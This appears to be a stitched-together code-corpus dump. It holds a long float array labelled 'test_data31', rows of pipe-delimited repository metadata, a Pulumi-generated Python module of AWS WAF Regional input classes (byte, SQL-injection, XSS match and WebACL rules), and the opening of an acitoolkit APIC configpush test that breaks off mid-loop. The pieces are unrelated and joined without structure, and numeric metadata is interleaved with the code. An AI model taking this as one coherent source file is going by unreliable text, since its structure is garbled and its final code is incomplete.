0.73125, 0.75625, 0.7875, 0.75625, 0.73125, 0.7, 0.675, 0.65, 0.61875, 0.59375, 0.56875, 0.5375, 0.5125, 0.48125, 0.45625, 0.43125, 0.4, 0.375, 0.35, 0.31875, 0.29375, 0.2625, 0.2375, 0.2125, 0.18125, 0.15625, 0.13125, 0.1, 0.075, 0.04375, 0.01875, -0.00625, -0.0375, -0.0625, -0.0875, -0.1125, -0.1375, -0.16875, -0.19375, -0.16875, -0.1375, -0.1125, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0625, -0.0375, -0.00625, 0.01875, 0.04375, 0.075, 0.1, 0.13125, 0.15625, 0.18125, 0.2125, 0.2375, 0.2625, 0.29375, 0.31875, 0.35, 0.375, 0.4, 0.43125, 0.45625, 0.48125, 0.5125, 0.5375, 0.56875, 0.59375, 0.61875, 0.65, 0.675, 0.7, 0.73125, 0.75625, 0.7875, 0.75625, 0.73125, 0.7, 0.675, 0.65, 0.61875, 0.59375, 0.56875, 0.5375, 0.5125, 0.48125, 0.45625, 0.43125, 0.4, 0.375, 0.35, 0.31875, 0.29375, 0.2625, 0.2375, 0.2125, 0.18125, 0.15625, 0.13125, 0.1, 0.075, 0.04375, 0.01875, -0.00625, -0.0375, -0.0625, -0.0875, -0.1125, -0.1375, -0.16875, -0.19375, -0.16875, -0.1375, -0.1125, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875]
filename = 'test_data31'
| 53,627
| 88,988
| 0.571472
| 40,007
| 160,881
| 2.297998
| 0.019797
| 0.471524
| 0.565763
| 0.938914
| 0.544477
| 0.544477
| 0.544477
| 0.544477
| 0.544477
| 0.544477
| 0
| 0.652146
| 0.124353
| 160,881
| 3
| 88,989
| 53,627
| 0.000461
| 0
| 0
| 0
| 0
| 0
| 0.000143
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
61aa58814c6827c6023a0af261b0c1a43e175454
| 15,337
|
py
|
Python
|
sdk/python/pulumi_aws_native/wafregional/_inputs.py
|
AaronFriel/pulumi-aws-native
|
5621690373ac44accdbd20b11bae3be1baf022d1
|
[
"Apache-2.0"
] | 29
|
2021-09-30T19:32:07.000Z
|
2022-03-22T21:06:08.000Z
|
sdk/python/pulumi_aws_native/wafregional/_inputs.py
|
AaronFriel/pulumi-aws-native
|
5621690373ac44accdbd20b11bae3be1baf022d1
|
[
"Apache-2.0"
] | 232
|
2021-09-30T19:26:26.000Z
|
2022-03-31T23:22:06.000Z
|
sdk/python/pulumi_aws_native/wafregional/_inputs.py
|
AaronFriel/pulumi-aws-native
|
5621690373ac44accdbd20b11bae3be1baf022d1
|
[
"Apache-2.0"
] | 4
|
2021-11-10T19:42:01.000Z
|
2022-02-05T10:15:49.000Z
|
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi SDK Generator. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
__all__ = [
'ByteMatchSetByteMatchTupleArgs',
'ByteMatchSetFieldToMatchArgs',
'GeoMatchSetGeoMatchConstraintArgs',
'IPSetDescriptorArgs',
'RateBasedRulePredicateArgs',
'RulePredicateArgs',
'SizeConstraintSetFieldToMatchArgs',
'SizeConstraintSetSizeConstraintArgs',
'SqlInjectionMatchSetFieldToMatchArgs',
'SqlInjectionMatchSetSqlInjectionMatchTupleArgs',
'WebACLActionArgs',
'WebACLRuleArgs',
'XssMatchSetFieldToMatchArgs',
'XssMatchSetXssMatchTupleArgs',
]
@pulumi.input_type
class ByteMatchSetByteMatchTupleArgs:
def __init__(__self__, *,
field_to_match: pulumi.Input['ByteMatchSetFieldToMatchArgs'],
positional_constraint: pulumi.Input[str],
text_transformation: pulumi.Input[str],
target_string: Optional[pulumi.Input[str]] = None,
target_string_base64: Optional[pulumi.Input[str]] = None):
pulumi.set(__self__, "field_to_match", field_to_match)
pulumi.set(__self__, "positional_constraint", positional_constraint)
pulumi.set(__self__, "text_transformation", text_transformation)
if target_string is not None:
pulumi.set(__self__, "target_string", target_string)
if target_string_base64 is not None:
pulumi.set(__self__, "target_string_base64", target_string_base64)
@property
@pulumi.getter(name="fieldToMatch")
def field_to_match(self) -> pulumi.Input['ByteMatchSetFieldToMatchArgs']:
return pulumi.get(self, "field_to_match")
@field_to_match.setter
def field_to_match(self, value: pulumi.Input['ByteMatchSetFieldToMatchArgs']):
pulumi.set(self, "field_to_match", value)
@property
@pulumi.getter(name="positionalConstraint")
def positional_constraint(self) -> pulumi.Input[str]:
return pulumi.get(self, "positional_constraint")
@positional_constraint.setter
def positional_constraint(self, value: pulumi.Input[str]):
pulumi.set(self, "positional_constraint", value)
@property
@pulumi.getter(name="textTransformation")
def text_transformation(self) -> pulumi.Input[str]:
return pulumi.get(self, "text_transformation")
@text_transformation.setter
def text_transformation(self, value: pulumi.Input[str]):
pulumi.set(self, "text_transformation", value)
@property
@pulumi.getter(name="targetString")
def target_string(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "target_string")
@target_string.setter
def target_string(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "target_string", value)
@property
@pulumi.getter(name="targetStringBase64")
def target_string_base64(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "target_string_base64")
@target_string_base64.setter
def target_string_base64(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "target_string_base64", value)
@pulumi.input_type
class ByteMatchSetFieldToMatchArgs:
def __init__(__self__, *,
type: pulumi.Input[str],
data: Optional[pulumi.Input[str]] = None):
pulumi.set(__self__, "type", type)
if data is not None:
pulumi.set(__self__, "data", data)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter
def data(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "data")
@data.setter
def data(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "data", value)
@pulumi.input_type
class GeoMatchSetGeoMatchConstraintArgs:
def __init__(__self__, *,
type: pulumi.Input[str],
value: pulumi.Input[str]):
pulumi.set(__self__, "type", type)
pulumi.set(__self__, "value", value)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter
def value(self) -> pulumi.Input[str]:
return pulumi.get(self, "value")
@value.setter
def value(self, value: pulumi.Input[str]):
pulumi.set(self, "value", value)
@pulumi.input_type
class IPSetDescriptorArgs:
def __init__(__self__, *,
type: pulumi.Input[str],
value: pulumi.Input[str]):
pulumi.set(__self__, "type", type)
pulumi.set(__self__, "value", value)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter
def value(self) -> pulumi.Input[str]:
return pulumi.get(self, "value")
@value.setter
def value(self, value: pulumi.Input[str]):
pulumi.set(self, "value", value)
@pulumi.input_type
class RateBasedRulePredicateArgs:
def __init__(__self__, *,
data_id: pulumi.Input[str],
negated: pulumi.Input[bool],
type: pulumi.Input[str]):
pulumi.set(__self__, "data_id", data_id)
pulumi.set(__self__, "negated", negated)
pulumi.set(__self__, "type", type)
@property
@pulumi.getter(name="dataId")
def data_id(self) -> pulumi.Input[str]:
return pulumi.get(self, "data_id")
@data_id.setter
def data_id(self, value: pulumi.Input[str]):
pulumi.set(self, "data_id", value)
@property
@pulumi.getter
def negated(self) -> pulumi.Input[bool]:
return pulumi.get(self, "negated")
@negated.setter
def negated(self, value: pulumi.Input[bool]):
pulumi.set(self, "negated", value)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@pulumi.input_type
class RulePredicateArgs:
def __init__(__self__, *,
data_id: pulumi.Input[str],
negated: pulumi.Input[bool],
type: pulumi.Input[str]):
pulumi.set(__self__, "data_id", data_id)
pulumi.set(__self__, "negated", negated)
pulumi.set(__self__, "type", type)
@property
@pulumi.getter(name="dataId")
def data_id(self) -> pulumi.Input[str]:
return pulumi.get(self, "data_id")
@data_id.setter
def data_id(self, value: pulumi.Input[str]):
pulumi.set(self, "data_id", value)
@property
@pulumi.getter
def negated(self) -> pulumi.Input[bool]:
return pulumi.get(self, "negated")
@negated.setter
def negated(self, value: pulumi.Input[bool]):
pulumi.set(self, "negated", value)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@pulumi.input_type
class SizeConstraintSetFieldToMatchArgs:
def __init__(__self__, *,
type: pulumi.Input[str],
data: Optional[pulumi.Input[str]] = None):
pulumi.set(__self__, "type", type)
if data is not None:
pulumi.set(__self__, "data", data)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter
def data(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "data")
@data.setter
def data(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "data", value)
@pulumi.input_type
class SizeConstraintSetSizeConstraintArgs:
def __init__(__self__, *,
comparison_operator: pulumi.Input[str],
field_to_match: pulumi.Input['SizeConstraintSetFieldToMatchArgs'],
size: pulumi.Input[int],
text_transformation: pulumi.Input[str]):
pulumi.set(__self__, "comparison_operator", comparison_operator)
pulumi.set(__self__, "field_to_match", field_to_match)
pulumi.set(__self__, "size", size)
pulumi.set(__self__, "text_transformation", text_transformation)
@property
@pulumi.getter(name="comparisonOperator")
def comparison_operator(self) -> pulumi.Input[str]:
return pulumi.get(self, "comparison_operator")
@comparison_operator.setter
def comparison_operator(self, value: pulumi.Input[str]):
pulumi.set(self, "comparison_operator", value)
@property
@pulumi.getter(name="fieldToMatch")
def field_to_match(self) -> pulumi.Input['SizeConstraintSetFieldToMatchArgs']:
return pulumi.get(self, "field_to_match")
@field_to_match.setter
def field_to_match(self, value: pulumi.Input['SizeConstraintSetFieldToMatchArgs']):
pulumi.set(self, "field_to_match", value)
@property
@pulumi.getter
def size(self) -> pulumi.Input[int]:
return pulumi.get(self, "size")
@size.setter
def size(self, value: pulumi.Input[int]):
pulumi.set(self, "size", value)
@property
@pulumi.getter(name="textTransformation")
def text_transformation(self) -> pulumi.Input[str]:
return pulumi.get(self, "text_transformation")
@text_transformation.setter
def text_transformation(self, value: pulumi.Input[str]):
pulumi.set(self, "text_transformation", value)
@pulumi.input_type
class SqlInjectionMatchSetFieldToMatchArgs:
def __init__(__self__, *,
type: pulumi.Input[str],
data: Optional[pulumi.Input[str]] = None):
pulumi.set(__self__, "type", type)
if data is not None:
pulumi.set(__self__, "data", data)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter
def data(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "data")
@data.setter
def data(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "data", value)
@pulumi.input_type
class SqlInjectionMatchSetSqlInjectionMatchTupleArgs:
def __init__(__self__, *,
field_to_match: pulumi.Input['SqlInjectionMatchSetFieldToMatchArgs'],
text_transformation: pulumi.Input[str]):
pulumi.set(__self__, "field_to_match", field_to_match)
pulumi.set(__self__, "text_transformation", text_transformation)
@property
@pulumi.getter(name="fieldToMatch")
def field_to_match(self) -> pulumi.Input['SqlInjectionMatchSetFieldToMatchArgs']:
return pulumi.get(self, "field_to_match")
@field_to_match.setter
def field_to_match(self, value: pulumi.Input['SqlInjectionMatchSetFieldToMatchArgs']):
pulumi.set(self, "field_to_match", value)
@property
@pulumi.getter(name="textTransformation")
def text_transformation(self) -> pulumi.Input[str]:
return pulumi.get(self, "text_transformation")
@text_transformation.setter
def text_transformation(self, value: pulumi.Input[str]):
pulumi.set(self, "text_transformation", value)
@pulumi.input_type
class WebACLActionArgs:
def __init__(__self__, *,
type: pulumi.Input[str]):
pulumi.set(__self__, "type", type)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@pulumi.input_type
class WebACLRuleArgs:
def __init__(__self__, *,
action: pulumi.Input['WebACLActionArgs'],
priority: pulumi.Input[int],
rule_id: pulumi.Input[str]):
pulumi.set(__self__, "action", action)
pulumi.set(__self__, "priority", priority)
pulumi.set(__self__, "rule_id", rule_id)
@property
@pulumi.getter
def action(self) -> pulumi.Input['WebACLActionArgs']:
return pulumi.get(self, "action")
@action.setter
def action(self, value: pulumi.Input['WebACLActionArgs']):
pulumi.set(self, "action", value)
@property
@pulumi.getter
def priority(self) -> pulumi.Input[int]:
return pulumi.get(self, "priority")
@priority.setter
def priority(self, value: pulumi.Input[int]):
pulumi.set(self, "priority", value)
@property
@pulumi.getter(name="ruleId")
def rule_id(self) -> pulumi.Input[str]:
return pulumi.get(self, "rule_id")
@rule_id.setter
def rule_id(self, value: pulumi.Input[str]):
pulumi.set(self, "rule_id", value)
@pulumi.input_type
class XssMatchSetFieldToMatchArgs:
def __init__(__self__, *,
type: pulumi.Input[str],
data: Optional[pulumi.Input[str]] = None):
pulumi.set(__self__, "type", type)
if data is not None:
pulumi.set(__self__, "data", data)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter
def data(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "data")
@data.setter
def data(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "data", value)
@pulumi.input_type
class XssMatchSetXssMatchTupleArgs:
def __init__(__self__, *,
field_to_match: pulumi.Input['XssMatchSetFieldToMatchArgs'],
text_transformation: pulumi.Input[str]):
pulumi.set(__self__, "field_to_match", field_to_match)
pulumi.set(__self__, "text_transformation", text_transformation)
@property
@pulumi.getter(name="fieldToMatch")
def field_to_match(self) -> pulumi.Input['XssMatchSetFieldToMatchArgs']:
return pulumi.get(self, "field_to_match")
@field_to_match.setter
def field_to_match(self, value: pulumi.Input['XssMatchSetFieldToMatchArgs']):
pulumi.set(self, "field_to_match", value)
@property
@pulumi.getter(name="textTransformation")
def text_transformation(self) -> pulumi.Input[str]:
return pulumi.get(self, "text_transformation")
@text_transformation.setter
def text_transformation(self, value: pulumi.Input[str]):
pulumi.set(self, "text_transformation", value)
| 31.364008
| 90
| 0.652214
| 1,716
| 15,337
| 5.57634
| 0.057692
| 0.136796
| 0.114119
| 0.069495
| 0.774271
| 0.720765
| 0.717316
| 0.705612
| 0.642491
| 0.634445
| 0
| 0.001757
| 0.220708
| 15,337
| 488
| 91
| 31.428279
| 0.798862
| 0.010497
| 0
| 0.710938
| 1
| 0
| 0.130125
| 0.049901
| 0
| 0
| 0
| 0
| 0
| 1
| 0.21875
| false
| 0
| 0.013021
| 0.091146
| 0.359375
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
1428a2cc593e28ad978a145fb05810b886c27fdb
| 116,101
|
py
|
Python
|
applications/configpush/apicservice_test.py
|
carterej1989/acitoolkit
|
8bc1e462c3bc0b6643004033e353520d438242d6
|
[
"Apache-2.0"
] | null | null | null |
applications/configpush/apicservice_test.py
|
carterej1989/acitoolkit
|
8bc1e462c3bc0b6643004033e353520d438242d6
|
[
"Apache-2.0"
] | 2
|
2018-05-07T19:40:50.000Z
|
2020-04-02T14:43:15.000Z
|
applications/configpush/apicservice_test.py
|
carterej1989/acitoolkit
|
8bc1e462c3bc0b6643004033e353520d438242d6
|
[
"Apache-2.0"
] | null | null | null |
"""
apicservice_test.py
"""
import json
import unittest
from apicservice import ApicService
from acitoolkit import (Tenant, Session, Filter, EPG, Contract, Context, ContractSubject, AppProfile, BridgeDomain,
AttributeCriterion, OutsideL3, OutsideEPG, OutsideNetwork, Session)
import sys
import time
from deepdiff import DeepDiff
import gzip
from pprint import pprint
import ast
try:
from apicservice_test_credentials import (LOGIN, PASSWORD, IPADDR)
except ImportError:
print '''
Please create a file called apicservice_test_credentials.py with the following:
IPADDR = ''
LOGIN = ''
PASSWORD = ''
'''
sys.exit(0)
class LoadConfig(object):
"""
class to load the config file, to create a session and ApicService object
"""
def __init__(self):
self.config = ''
self.session = ''
self.tool = ''
def login(self):
self.config = {}
self.config['apic'] = {'user_name': LOGIN,
'password': PASSWORD,
'ip_address': IPADDR,
'use_https': False}
session = Session(
'http://' + self.config['apic']['ip_address'],
self.config['apic']['user_name'],
self.config['apic']['password'])
resp = session.login()
if not resp.ok:
print('%% Could not login to APIC')
sys.exit(0)
return session
def delete_tenant(self, tenant_name=''):
load_config = LoadConfig()
session = load_config.login()
tenants = Tenant.get(session)
for tenant in tenants:
if tenant.name == tenant_name:
tenant.mark_as_deleted()
resp = tenant.push_to_apic(session)
if not resp.ok:
print "tenant deletion failed"
def load_configFile(self, config_file, is_file=True, prompt=False, displayonly=False, tenant_name='configpush-test',
app_name='appProfile-test', l3ext_name='l3ext-test', useipEpgs=False):
"""
load_configFile
:param config_file:
:param is_file:
:param displayonly:
:param tenant_name:
:param app_name:
:param app_name:
:param useipEpgs:
:return:
"""
if is_file:
with gzip.open(config_file, 'rb') as config_file:
self.config = json.load(config_file)
else:
self.config = json.loads(config_file)
self.config['apic'] = {'user_name': LOGIN,
'password': PASSWORD,
'ip_address': IPADDR,
'use_https': False}
self.session = Session('http://' + self.config['apic']['ip_address'], self.config['apic']['user_name'],
self.config['apic']['password'])
resp = self.session.login()
if not resp.ok:
print('%% Could not login to APIC')
sys.exit(0)
self.tool = ApicService()
self.tool.displayonly = displayonly
self.tool.prompt = prompt
self.tool.set_tenant_name(tenant_name)
self.tool.set_app_name(app_name)
self.tool.set_l3ext_name(l3ext_name)
if useipEpgs:
self.tool.use_ip_epgs()
resp = self.tool.add_config(self.config)
if resp != 'OK':
print "ERROR in config. " + resp
class TestConfigpush(unittest.TestCase):
"""
test case to push a contract config to APIC and update it in the next revision by changing some policies, filters, contracts
"""
def test_initial_configpush(self):
"""
initial test to configpush
push a sample config with 2 clusters, 1 policy.
check the tenant config after it is pushed to apic by tenant.get_deep()
verify the num of children expected and existing in apic for this tenant
"""
config_file = """
{
"clusters": [
{
"name": "Configpushtest*-(1)",
"id": "56c55b8761707062b2d11b00",
"descr": "sample description",
"route_tag": {
"subnet_mask": "173.38.111.0/24",
"name": "rtp1-dcm01n-gp-db-dr2:iv2133"
},
"labels": [
],
"nodes": [
{
"ip": "173.38.111.127",
"name": "lnxdb-dr-vm-421"
},
{
"ip": "173.38.111.131",
"name": "lnxdb-dr-vm-422"
}
]
},
{
"name": "Configpushtest*-(2)",
"id": "56c3d31561707035c0c12b00",
"descr": "sample description",
"approved": true,
"route_tag": {
"subnet_mask": "0.0.0.0/0",
"name": "INTERNET-EXTNET"
},
"labels": [
],
"nodes": [
{
"ip": "173.38.111.126",
"name": "lnxdb-dr-vm-423"
},
{
"ip": "173.38.111.128",
"name": "lnxdb-dr-vm-424"
}
]
}
],
"policies": [
{
"src": "56c55b8761707062b2d11b00",
"dst": "56c3d31561707035c0c12b00",
"src_name": "Configpushtest-policy*-(1)",
"dst_name": "Configpushtest-policy*-(2)",
"descr": "sample description",
"whitelist": [
{
"port": [
0,
0
],
"proto": 1,
"action": "ALLOW"
},
{
"port": [
0,
0
],
"proto": 6,
"action": "ALLOW"
}
]
}
]
}
"""
tenant_name = 'configpush-test'
load_config = LoadConfig()
load_config.load_configFile(config_file, is_file=False)
tenants = Tenant.get(load_config.session)
for tenant in tenants:
if tenant.name == tenant_name:
tenant.mark_as_deleted()
resp = tenant.push_to_apic(load_config.session)
if not resp.ok:
print "tenant deletion failed"
load_config = LoadConfig()
load_config.load_configFile(config_file, is_file=False)
time.sleep(5)
tenants = Tenant.get_deep(load_config.session, names=[load_config.tool.tenant_name])
for tenant in tenants:
if tenant.name == 'configpush-test':
existing_filters = tenant.get_children(Filter)
self.assertEquals(len(existing_filters), 2,
"filter count did not match for the pushed config and existing config")
app_profiles = tenant.get_children(AppProfile)
app = app_profiles[0]
self.assertEquals(
app.name,
'appProfile-test',
"application profile name didnot match with the default appProfile-test")
outsideL3s = tenant.get_children(OutsideL3)
self.assertEquals(
outsideL3s[0].name,
'l3ext-test',
"External routed network with default name doesnot exist l3ext-test")
for outsideL3 in outsideL3s:
if outsideL3.name == 'l3ext-test':
outsideEpgs = outsideL3.get_children(OutsideEPG)
self.assertEquals(len(outsideEpgs), 0, "the num of outside epgs didnot match")
existing_epgs = app.get_children(EPG)
self.assertEquals(len(existing_epgs), 2,
"epgs count did not match for the pushed config and existing config")
for existing_epg in existing_epgs:
self.assertEqual(existing_epg.is_attributed_based, False,
"attribute based is true for EPG " + existing_epg.name)
if existing_epg.name == 'Configpushtest_-_1_-0':
